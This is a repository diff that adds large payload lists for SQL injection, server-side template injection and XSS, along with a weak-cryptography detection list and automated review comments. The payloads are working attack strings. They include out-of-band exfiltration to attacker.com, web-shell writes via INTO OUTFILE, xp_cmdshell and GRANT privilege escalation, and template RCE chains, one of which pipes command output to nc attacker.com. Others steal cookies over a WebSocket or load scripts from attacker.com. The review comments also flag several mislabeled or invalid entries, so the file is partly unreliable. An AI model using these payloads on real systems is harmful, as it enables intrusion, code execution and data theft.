- **[Vulnerable Components](./Vulnerable-Components/)** - Known vulnerable libraries - **[Vulnerable Components](./Vulnerable-Components/)** - Known vulnerable libraries
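Review bot: two of the three new entries do not fit the `**Configuration & Design:**` group they are filed under. HTTP Request Smuggling, described here as `Request desynchronization attacks`, is a protocol-parsing discrepancy between front-end and back-end servers, and JWT Vulnerabilities, described as `JSON Web Token implementation flaws`, are authentication and cryptographic implementation bugs; only CORS Misconfiguration is a configuration issue. Either move those two to the group matching their class or widen the heading so the index remains a reliable guide to where a payload lives.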
+194
@@ -84,3 +84,197 @@ admin'/*
{"$where": "sleep(5000)"} {"$where": "sleep(5000)"}
' || '1'=='1 ' || '1'=='1
admin' || 'a'=='a admin' || 'a'=='a
# Advanced time-based blind SQL injection
# MySQL advanced
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND (SELECT SLEEP(5) FROM information_schema.tables LIMIT 1)--
' UNION SELECT IF(1=1,SLEEP(5),0)--
' AND IF(1=1,SLEEP(5),0)--
' OR IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0)--
# PostgreSQL advanced
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--
'; SELECT pg_sleep(5) WHERE 1=1--
' AND 1=(SELECT COUNT(*) FROM generate_series(1,1000000))--
# MSSQL advanced
'; IF (1=1) WAITFOR DELAY '0:0:5'--
'; IF (SELECT USER) = 'sa' WAITFOR DELAY '0:0:10'--
' AND (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3)>0--
# Oracle advanced
' AND 1=(SELECT COUNT(*) FROM all_users t1,all_users t2,all_users t3)--
' AND (SELECT UTL_INADDR.get_host_name('127.0.0.1') FROM dual) IS NOT NULL--
' AND (SELECT DBMS_PIPE.RECEIVE_MESSAGE('a',5) FROM dual) IS NULL--
# WAF/Filter bypass techniques
# Space bypass
' OR '1'='1'--
'OR'1'='1'--
'OR'1'='1
'%09OR%091=1-- # Tab
'%0AOR%0A1=1-- # New line
'%0DOR%0D1=1-- # Carriage return
'/**/OR/**/1=1--
# Comment bypass
'/*!OR*/1=1--
'/*! OR */1=1--
'/*!50000OR*/1=1--
'/*!12345OR*/1=1--
# Case variation bypass
' Or '1'='1'--
' oR '1'='1'--
' OR '1'='1'--
' UnIoN SeLeCt--
# Alternative operators
' || '1'='1'--
' && 1=1--
' | 1=1--
' & 1=1--
# Encoding bypass
%27%20OR%201=1--
%27%20%4F%52%20%31%3D%31--
' %4F%52 1=1--
\' OR 1=1--
%5C%27 OR 1=1--
# String concatenation bypass
# MySQL
'||' (SELECT 'x')='x
' OR CONCAT('a','a')='aa'--
# MSSQL
' OR 'a'+'a'='aa'--
' OR 'a'||'a'='aa'--
# Oracle
' OR 'a'||'a'='aa'--
' OR CONCAT('a','a')='aa'--
# PostgreSQL
' OR 'a'||'a'='aa'--
# Obfuscation techniques
' OR 1=1%00--
' OR 1=1%20--
' OR 1=1;%00
' OR 1=1;%20
' OR 1=1/*foo*/--
' OR 1=1#%0A
# Hex encoding
0x61646D696E # admin
0x27206F72202731273D2731 # ' or '1'='1
# Char function
CHAR(39) OR CHAR(49)=CHAR(49) # ' OR '1'='1
' OR CHR(49)=CHR(49)-- # Oracle/PostgreSQL
' OR ASCII(49)=49--
# Advanced UNION attacks
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns--
' UNION SELECT username,password FROM users--
' UNION SELECT @@version,NULL,NULL--
' UNION SELECT user(),database(),version()--
# Out-of-band exploitation
# DNS exfiltration (MySQL)
' AND (SELECT LOAD_FILE(CONCAT('\\\\',(SELECT @@version),'.attacker.com\\a')))--
# Oracle UTL_HTTP
' AND (SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual)--
# MSSQL xp_dirtree
'; EXEC master..xp_dirtree '\\attacker.com\a'--
# Error-based data extraction
# MySQL
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT @@version),0x3a,FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)y)--
' AND EXTRACTVALUE(1,CONCAT(0x5c,(SELECT @@version)))--
' AND UPDATEXML(1,CONCAT(0x5c,(SELECT @@version)),1)--
# MSSQL
' AND 1=CONVERT(int,(SELECT @@version))--
' AND 1=CAST((SELECT @@version) AS int)--
# PostgreSQL
' AND 1=CAST((SELECT version()) AS numeric)--
# Oracle
' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT banner FROM v$version WHERE rownum=1))--
# Second-order SQL injection
username: admin'--
password: anything
# JSON-based SQL injection
{"username":"admin' OR '1'='1","password":"x"}
{"id":"1' UNION SELECT NULL--"}
# XML-based SQL injection
<user><name>admin' OR '1'='1</name></user>
# LDAP + SQL combined
*)(uid=*))(&(uid=admin' OR '1'='1
# Cookie-based SQL injection
Cookie: id=1' OR '1'='1--
# HTTP Header injection
User-Agent: ' OR '1'='1--
Referer: ' OR '1'='1--
X-Forwarded-For: ' OR '1'='1--
# Routed SQL injection (through application)
/?search=x' AND (SELECT * FROM users WHERE username='admin')--
# Advanced boolean-based blind
' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'--
' AND (SELECT ASCII(SUBSTRING(password,1,1)) FROM users LIMIT 1)>100--
' AND (SELECT LENGTH(password) FROM users WHERE username='admin')>5--
# Bitwise operations
' AND (SELECT @@version)&1--
' AND (SELECT 1)^1=0--
# String functions exploitation
' AND (SELECT REVERSE('olleh'))='hello'--
' AND (SELECT REPLACE('test','t','x'))='xesx'--
' AND (SELECT SUBSTRING('hello',1,1))='h'--
# Database enumeration
' UNION SELECT schema_name,NULL FROM information_schema.schemata--
' UNION SELECT table_name,table_schema FROM information_schema.tables--
' UNION SELECT column_name,table_name FROM information_schema.columns--
# Privilege escalation attempts
'; GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%'--
'; ALTER USER 'root'@'localhost' IDENTIFIED BY 'hacked'--
'; CREATE USER attacker IDENTIFIED BY 'pass123'--
# File operations
# MySQL
' UNION SELECT LOAD_FILE('/etc/passwd')--
' INTO OUTFILE '/var/www/html/shell.php'--
' INTO DUMPFILE '/var/www/html/shell.php'--
# PostgreSQL
'; COPY (SELECT '') TO '/tmp/output.txt'--
# MSSQL
'; EXEC xp_cmdshell 'dir'--
'; EXEC sp_configure 'xp_cmdshell',1--
# Conditional responses
' AND IF(1=1,1,(SELECT 1 UNION SELECT 2))--
' AND CASE WHEN (1=1) THEN 1 ELSE 0 END--
# Mass assignment attacks via SQL
' UPDATE users SET role='admin' WHERE username='attacker'--
' INSERT INTO users (username,role) VALUES ('attacker','admin')--
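Review bot: several payload lines carry trailing annotations (`'%09OR%091=1-- # Tab`, `'%0AOR%0A1=1-- # New line`, `0x61646D696E # admin`, and the `# Char function` lines), whereas everywhere else in this file, including the hunk's context lines, comments sit on their own `#` line; any tool that consumes the list line by line will send ` # Tab` as part of the payload. Move each annotation to a `#` line above its payload. Under `# MSSQL` in `# String concatenation bypass`, `' OR 'a'||'a'='aa'--` is not valid T-SQL, which concatenates with `+` (already shown on the line above) and does not support `||`; it duplicates the PostgreSQL and Oracle lines and should be dropped from that section. Also, `' OR '1'='1'--` appears both as the first entry under `# Space bypass` and again under `# Case variation bypass`, where it adds no case variation.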
+37
@@ -0,0 +1,37 @@
# Server-Side Template Injection (SSTI)
## Description
Server-Side Template Injection occurs when user input is embedded in a template in an unsafe manner, allowing attackers to inject template directives and execute arbitrary code on the server. SSTI can lead to remote code execution, information disclosure, and complete server compromise.
## Common Vulnerable Template Engines
- **Jinja2** (Python - Flask, Django)
- **Twig** (PHP)
- **Freemarker** (Java)
- **Velocity** (Java)
- **Smarty** (PHP)
- **Pug/Jade** (Node.js)
- **ERB** (Ruby on Rails)
- **Thymeleaf** (Java)
## Common Attack Vectors
- User input in template rendering
- Email templates with user-controlled content
- Error messages with dynamic content
- Markdown/Wiki renderers
- PDF generators
- Report generators
## Testing Approach
1. Inject template syntax like `{{7*7}}` or `${7*7}` in input fields
2. Observe if mathematical expressions are evaluated
3. Identify the template engine through error messages or syntax
4. Escalate to code execution using engine-specific payloads
## Detection Methods
- Submit polyglot payloads: `${{<%[%'"}}%\`
- Test mathematical operations: `{{7*7}}`, `${7*7}`
- Check for template-specific syntax errors
- Analyze response differences
## Payloads
See `ssti-payloads.txt` for a comprehensive list of SSTI payloads.
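Review bot: the first engine entry, `**Jinja2** (Python - Flask, Django)`, is misleading, because Django's default engine is the Django Template Language and Jinja2 is only an optional backend that a project has to configure; the payload file this README points to also treats Django as a separate engine. Reword to `(Python - Flask; Django when the Jinja2 backend is configured)`. As with the JWT README, there is no remediation section: add a short `## Mitigations` stating that user input must be passed to the template as data (context variables), never concatenated into the template source, and that engines offering a sandbox or logic-less mode should be run that way, so the detection and escalation steps above can be read against the controls that defeat them.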
+310
@@ -0,0 +1,310 @@
# Server-Side Template Injection (SSTI) Payloads
# Detection/Polyglot payloads
${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
# Jinja2 (Python - Flask)
# Basic detection
{{7*7}}
{{7*'7'}}
{{config}}
{{self}}
# Information disclosure
{{config.items()}}
{{self.__dict__}}
{{request.environ}}
{{request.application.__globals__}}
# File read
{{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
# Remote code execution
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read()}}
{{self._TemplateReference__context.joiner.__init__.__globals__.os.popen('whoami').read()}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{config.__class__.__init__.__globals__['os'].popen('cat /etc/passwd').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{request['application']['__globals__']['__builtins__']['__import__']('os').popen('ls').read()}}
{{lipsum.__globals__['os'].popen('whoami').read()}}
{{cycler.__init__.__globals__.os.popen('id').read()}}
{{joiner.__init__.__globals__.os.popen('id').read()}}
{{namespace.__init__.__globals__.os.popen('id').read()}}
# Jinja2 sandbox escape
{{''.__class__.__base__.__subclasses__()}}
{{[].__class__.__base__.__subclasses__()}}
{{''.__class__.__mro__[1].__subclasses__()}}
# Twig (PHP)
# Basic detection
{{7*7}}
{{7*'7'}}
{{dump(app)}}
{{app.request.server.all|join(',')}}
# Information disclosure
{{_self.env.getGlobals()}}
{{_self.env}}
{{dump(_context)}}
# Remote code execution
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}}
{{['id']|filter('system')}}
{{['cat /etc/passwd']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['id']|map('passthru')|join}}
{{['whoami']|map('system')|join}}
{{'a'.toUpperCase()}}
{{1*1}}{{6*6}}
# Freemarker (Java)
# Basic detection
${7*7}
#{7*7}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")}
# Remote code execution
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("whoami")}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("cat /etc/passwd")}
<#assign ex="freemarker.template.utility.ObjectConstructor"?new()>${ex("java.lang.ProcessBuilder","id").start()}
${"freemarker.template.utility.Execute"?new()("id")}
# Information disclosure
${.data_model}
${.globals}
${.main}
${.namespace}
${.current_namespace}
${.vars}
# Velocity (Java)
# Basic detection
#set($x=7*7)$x
${{7*7}}
# Remote code execution
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
#set($null=$ex.waitFor())
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
#set($x='')##
#set($rt=$x.class.forName('java.lang.Runtime'))##
#set($chr=$x.class.forName('java.lang.Character'))##
#set($str=$x.class.forName('java.lang.String'))##
#set($ex=$rt.getRuntime().exec('id'))##
$ex.waitFor()
#set($out=$ex.getInputStream())##
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
# Smarty (PHP)
# Basic detection
{$smarty.version}
{php}echo `id`;{/php}
{7*7}
# Remote code execution
{system('ls')}
{system('cat /etc/passwd')}
{php}system('id');{/php}
{php}phpinfo();{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
# Information disclosure
{$smarty.template}
{$smarty.current_dir}
{$smarty.template_dir}
# Pug/Jade (Node.js)
# Basic detection
#{7*7}
!{7*7}
# Remote code execution
#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('whoami')}()}
#{global.process.mainModule.require('child_process').exec('id')}
#{global.process.mainModule.require('child_process').execSync('id').toString()}
- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
= x.exec('id | nc attacker.com 8080')
# ERB (Ruby on Rails)
# Basic detection
<%= 7*7 %>
<%= system('whoami') %>
# Remote code execution
<%= system('id') %>
<%= `id` %>
<%= IO.popen('id').readlines() %>
<%= require 'open3' %><%= Open3.capture2("id")[0] %>
<%= File.open('/etc/passwd').read %>
# Thymeleaf (Java)
# Basic detection
[[${7*7}]]
[(${7*7})]
[# th:block th:each="i : ${#numbers.sequence(1, 7*7)}" /]
# Remote code execution (with SpringEL)
${T(java.lang.Runtime).getRuntime().exec('calc')}
*{T(java.lang.Runtime).getRuntime().exec('calc')}
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
# Tornado (Python)
# Basic detection
{{7*7}}
{% import os %}{{os.popen("id").read()}}
# Remote code execution
{% import subprocess %}{{subprocess.check_output('id',shell=True)}}
{% import os %}{{os.system('whoami')}}
# Mako (Python)
# Basic detection
${7*7}
<%={{7*7}%>
# Remote code execution
<%import os%>${os.popen("id").read()}
${__import__('os').popen('id').read()}
# Django (Python)
# Basic detection
{{7*7}}
{% debug %}
# Limited RCE (usually sandboxed)
{{request.META}}
{{settings.SECRET_KEY}}
# Handlebars (Node.js)
# Basic detection
{{7*7}}
{{this}}
# Prototype pollution
{{#with "constructor"}}{{#with split as |a|}}{{pop (push "alert('XSS')")}}{{#with .}}{{#with (concat (lookup join (slice 0 1)))}}{{#each .}}{{#with (string.sub.call ../sub "constructor")}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}
# Groovy (Java)
# Basic detection
${7*7}
<%= 7*7 %>
# Remote code execution
${"".getClass().forName("java.lang.Runtime").getRuntime().exec("calc")}
# Dot (JavaScript)
# Basic detection
{{=7*7}}
# Remote code execution
{{= global.process.mainModule.require('child_process').execSync('id').toString() }}
# Nunjucks (JavaScript)
# Basic detection
{{7*7}}
{{foo}}
# Remote code execution
{{range.constructor("return global.process.mainModule.require('child_process').execSync('id')")()}}
# Razor (.NET)
# Basic detection
@(7*7)
@{7*7}
# Information disclosure
@System.Diagnostics.Process.GetCurrentProcess().Id
@Directory.GetFiles("C:\\")
# EJS (JavaScript)
# Basic detection
<%=7*7%>
# Remote code execution
<%=global.process.mainModule.require('child_process').execSync('id')%>
# Underscore/Lodash templates (JavaScript)
# Basic detection
<%=7*7%>
# Remote code execution
<%= _.template('test')() %>
# Marko (JavaScript)
# Basic detection
${7*7}
# Remote code execution
${console.log(global.process.mainModule.require('child_process').execSync('id').toString())}
# Plate (Rust)
# Basic detection
{{7*7}}
# Liquid (Ruby)
# Basic detection
{{7 | times: 7}}
# Scalate (Scala)
# Basic detection
${7*7}
<%=7*7%>
# Template.js
# Basic detection
{{7*7}}
# Trim (Java)
# Basic detection
${7*7}
# Jade/Pug continued (with more variants)
- var x = global.process.mainModule.require
!{x('child_process').execSync('cat /etc/passwd')}
# ColdFusion
# Basic detection
#7*7#
# ASP.NET Web Forms
# Basic detection
<%= 7*7 %>
# Expression Language (Java EE)
# Basic detection
${7*7}
#{7*7}
# Remote code execution
${pageContext.request.getSession().setAttribute("shell","".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec(request.getParameter("cmd")))}
# Generic testing payloads
{{self}}
${self}
<%= self %>
#{self}
*{self}
@{self}
{{constructor}}
{{__class__}}
{{__init__}}
{{__globals__}}
{{__import__}}
# Blind SSTI detection
a{{9999*9999}}b
a${9999*9999}b
a<%= 9999*9999 %>b
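Review bot: four `# Basic detection` sections contain payloads that execute commands rather than arithmetic: Freemarker `<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")}`, Smarty `{php}echo \`id\`;{/php}`, ERB `<%= system('whoami') %>` and Tornado `{% import os %}{{os.popen("id").read()}}`. Detection probes should be side-effect-free (`{{7*7}}`-style) so that a tester fingerprinting the engine does not run commands on the target; move those lines into the matching `# Remote code execution` sections. Three labels are also wrong: under Twig, `{{'a'.toUpperCase()}}` is a JavaScript string method, not Twig syntax (Twig uses the `|upper` filter), and reads like a misfiled Node.js probe; under Django, `# Limited RCE (usually sandboxed)` sits over `{{request.META}}` and `{{settings.SECRET_KEY}}`, which are information disclosure, since the Django Template Language does not execute code; and the Handlebars entry headed `# Prototype pollution` is the `constructor`/`lookup` sandbox-escape chain and performs no prototype write, so label it as a sandbox escape. Lastly, the Mako line `<%={{7*7}%>` does not close its `{{`; check it against the intended syntax or drop it.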
+205
@@ -21,3 +21,208 @@ AKIA[0-9A-Z]{16} # AWS Access Key pattern
[0-9a-zA-Z]{32} # Generic 32-char key [0-9a-zA-Z]{32} # Generic 32-char key
ghp_[0-9a-zA-Z]{36} # GitHub Personal Access Token pattern ghp_[0-9a-zA-Z]{36} # GitHub Personal Access Token pattern
sk_live_[0-9a-zA-Z]{24} # Stripe Live Secret Key pattern sk_live_[0-9a-zA-Z]{24} # Stripe Live Secret Key pattern
# Weak encryption algorithms
# DES (Data Encryption Standard) - 56-bit key
DES
DES-CBC
DES-ECB
DES-EDE
DES-EDE-CBC
# 3DES with weak keys
3DES
DES-EDE3
DES-EDE3-CBC
# RC4 (Rivest Cipher 4)
RC4
RC4-40
RC4-128
ARCFOUR
# RC2
RC2
RC2-40-CBC
RC2-64-CBC
RC2-CBC
# MD5 hash algorithm (broken)
MD5
MD5-SHA1
# SHA1 hash algorithm (weak)
SHA1
SHA-1
# Weak RSA key sizes
RSA-512
RSA-768
RSA-1024
# ECB mode (Electronic Codebook) - deterministic
AES-128-ECB
AES-192-ECB
AES-256-ECB
# Weak padding schemes
PKCS1-v1_5
PKCS#1 v1.5
# Null encryption
NULL
eNULL
NULL-MD5
NULL-SHA
# Export grade ciphers
EXP-DES-CBC-SHA
EXP-RC2-CBC-MD5
EXP-RC4-MD5
# Anonymous key exchange (no authentication)
AECDH
ADH
aNULL
# Weak Diffie-Hellman
DH-512
DH-1024
# CBC with weak MAC (BEAST/POODLE vulnerable)
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_3DES_EDE_CBC_SHA
# SSL/TLS version issues
SSLv2
SSLv3
TLSv1.0
TLSv1.1
# Weak cipher suites
TLS_RSA_WITH_RC4_128_SHA
TLS_RSA_WITH_RC4_128_MD5
TLS_RSA_WITH_DES_CBC_SHA
TLS_DH_anon_WITH_AES_128_CBC_SHA
# XOR cipher (trivial)
XOR
# Caesar cipher
ROT13
ROT47
# Vigenere cipher patterns
VIGENERE
# Insecure random number generators
# Predictable seeds
PRNG with time() seed
Math.random()
rand()
srand(time())
# Weak key derivation functions
PBKDF1
MD5-based KDF
SHA1-based KDF
# Hardcoded encryption keys (testing patterns)
key=00000000000000000000000000000000
key=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
key=12345678901234567890123456789012
secretkey=admin
encryptionKey=password
# Weak initialization vectors
IV=00000000000000000000000000000000
IV=11111111111111111111111111111111
Fixed IV
Reused IV
# Predictable salts
salt=salt
salt=123456
salt=""
No salt
# Hash collision examples
# MD5 collisions
d131dd02c5e6eec4693d9a0698aff95c # Collision pair 1
d131dd02c5e6eec4693d9a0698aff95c # Collision pair 2
# Timing attack vulnerabilities
String comparison without constant time
strcmp() without timing safety
# Padding oracle indicators
PaddingException
Invalid padding
Bad padding
# ECB detection patterns (identical blocks)
Block1: 0123456789ABCDEF
Block2: 0123456789ABCDEF
# Weak HMAC
HMAC-MD5
HMAC-SHA1
# CRC (not cryptographic)
CRC32
CRC16
ADLER32
# Length extension attacks
SHA-256 without HMAC
SHA-512 without HMAC
# Insecure modes of operation
CTR without authentication
CBC without HMAC
OFB mode
# Bit flipping attack vectors
CBC mode tampering
CFB mode tampering
# Known weak parameters
p=2 # Weak prime
g=1 # Weak generator
e=3 # Weak RSA exponent
# Textbook RSA (no padding)
RSA without OAEP
RSA without PSS
# Weak digital signatures
DSA with k reuse
ECDSA with k reuse
DSA-SHA1
# Certificate issues
Self-signed certificates
Expired certificates
MD5 certificate signature
SHA1 certificate signature
# Java Cipher strings (weak)
AES/ECB/NoPadding
AES/ECB/PKCS5Padding
DES/ECB/PKCS5Padding
DESede/ECB/PKCS5Padding
# OpenSSL weak ciphers
openssl enc -des
openssl enc -des3
openssl enc -rc4
# Bcrypt with low cost
bcrypt cost < 10
bcrypt rounds = 1
# Scrypt with weak parameters
N=2^10 (too low)
r=1 (too low)
p=1 (too low)
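Review bot: the two "MD5 collisions" lines (`d131dd02c5e6eec4693d9a0698aff95c # Collision pair 1` / `... # Collision pair 2`) are byte-for-byte identical, so they are not a collision pair (that would be two distinct inputs with the same digest), and a lone 32-hex-character value reads as a digest rather than as colliding inputs; drop the block or relabel it as the digest of a known example. More broadly, this file opens with grep-able regexes (`AKIA[0-9A-Z]{16}`, `ghp_[0-9a-zA-Z]{36}`) but most of the additions are free-text checklist items such as `Fixed IV`, `No salt`, `PRNG with time() seed` and `bcrypt cost < 10`, which no scanner can match against source; keep literal identifiers here (`AES/ECB/PKCS5Padding`, `DES-EDE3-CBC`, `Math.random()`) and move the descriptive items to a separate checklist. A few classifications are also off: `DES-EDE` is two-key 3DES, not the 56-bit DES it is listed under; `TLS_RSA_WITH_AES_128_CBC_SHA` sits under "CBC with weak MAC" although its MAC is HMAC-SHA1 and BEAST/POODLE concern CBC in TLS 1.0/SSLv3, not the MAC; and `OFB mode` is no weaker than the `CTR without authentication` entry above it, the shared problem being missing authentication.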
+212
@@ -541,3 +541,215 @@ a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
# SVG/HTML nesting XSS # SVG/HTML nesting XSS
<svg></svg></iframe> <svg></svg></iframe>
# Modern XSS vectors and WAF bypasses
# AngularJS template injection
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{$eval.constructor('alert(1)')()}}
{{$parent.constructor('alert(1)')()}}
<div ng-app ng-csp><div ng-controller="test">{{$eval.constructor('alert(1)')()}}</div></div>
# VueJS template injection
{{constructor.constructor('alert(1)')()}}
{{_c.constructor('alert(1)')()}}
<div v-html="'<img src=x onerror=alert(1)>'"></div>
# React JSX injection
<img src=x onerror={alert(1)} />
<div dangerouslySetInnerHTML={{__html: '<img src=x onerror=alert(1)>'}} />
# Mutation XSS (mXSS)
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<listing>&lt;img src=x onerror=alert(1)&gt;</listing>
<style><img src=x onerror=alert(1)></style>
# DOM clobbering
<form id=test><input id=test2></form><form id=test2><input id=test></form>
<img name=alert id=alert src=x onerror=alert(1)>
<form name=test><input id=attributes></form>
# Polyglot XSS
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
# HTML5 new tags
<details open ontoggle=alert(1)>
<details open ontoggle="alert(1)">
<marquee onstart=alert(1)>
<meter onmouseover=alert(1)>0</meter>
<progress value=0 max=100 onmouseover=alert(1)>
<dialog open onclose=alert(1)>
<keygen onfocus=alert(1)>
# WebSocket XSS
<script>ws=new WebSocket('ws://attacker.com');ws.send(document.cookie);</script>
# postMessage XSS
<script>parent.postMessage('<img src=x onerror=alert(1)>','*')</script>
<iframe src="javascript:parent.postMessage('<img src=x onerror=alert(1)>','*')">
# Web Worker XSS
<script>w=new Worker('data:text/javascript,postMessage(document.cookie)');</script>
# Service Worker XSS
<script>navigator.serviceWorker.register('data:text/javascript,alert(1)')</script>
# CSS-based XSS
<style>@import'data:text/css,body{background:url(javascript:alert(1))}';</style>
<style>*{background:url('javascript:alert(1)')}</style>
<link rel=stylesheet href='data:text/css,*{x:expression(alert(1))}'>
# XML namespace XSS
<html xmlns:xss>
<?import namespace="xss" implementation="http://attacker.com/xss.htc"?>
<xss:xss>test</xss:xss>
# XSLT XSS
<xsl:value-of select="system-property('xsl:vendor')"/>
<xsl:template match="/">
<script>alert(1)</script>
</xsl:template>
# Unicode bypass
\u003cscript\u003ealert(1)\u003c/script\u003e
<script>alert\u0028 1\u0029</script>
\x3cscript\x3ealert(1)\x3c/script\x3e
# Octal encoding
\74\163\143\162\151\160\164\76alert(1)\74\57\163\143\162\151\160\164\76
# Hex encoding
\x3c\x73\x63\x72\x69\x70\x74\x3ealert(1)\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e
# HTML entity encoding
&lt;script&gt;alert(1)&lt;/script&gt;
&#60;script&#62;alert(1)&#60;/script&#62;
&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;
# Double encoding
%253Cscript%253Ealert(1)%253C%2Fscript%253E
# UTF-7 encoding
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
# WAF bypass with comments
<scr<!---->ipt>alert(1)</scr<!---->ipt>
<scr<script>ipt>alert(1)</scr</script>ipt>
# WAF bypass with null bytes
<script\x00>alert(1)</script>
<scri\x00pt>alert(1)</scri\x00pt>
# WAF bypass with newlines
<script
>alert(1)</script>
<scri\npt>alert(1)</scri\npt>
# Obfuscated JavaScript
<script>eval(atob('YWxlcnQoMSk='))</script>
<script>Function('alert(1)')()</script>
<script>[1].map(alert)</script>
<script>top[/al/.source+/ert/.source](1)</script>
# JSFuck
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
# Content Security Policy bypass
<link rel="prefetch" href="javascript:alert(1)">
<link rel="prerender" href="javascript:alert(1)">
<base href="javascript:alert(1)//">
# srcdoc iframe XSS
<iframe srcdoc="<script>alert(1)</script>">
<iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;">
# HTML imports XSS
<link rel="import" href="data:text/html,<script>alert(1)</script>">
# Script gadgets
<div id=x tabindex=1 onfocus=alert(1)></div><input value=clickme>
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus><input autofocus>
<video poster=javascript:alert(1)//></video>
<body onload=alert(1)>
<body oninput=alert(1)><input autofocus>
# RPO (Relative Path Overwrite)
<script src="//attacker.com/poc.js"></script>
<script src="/poc.js"></script>
# Dangling markup injection
"><img src='//attacker.com?
'><img src='//attacker.com?
# AngularJS 1.6+ sandbox bypass
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}
# Template literals
<script>eval(`alert\x281\x29`)</script>
<script>Function`x${alert`1`}x`</script>
# Arrow functions
<script>_=alert,_(1)</script>
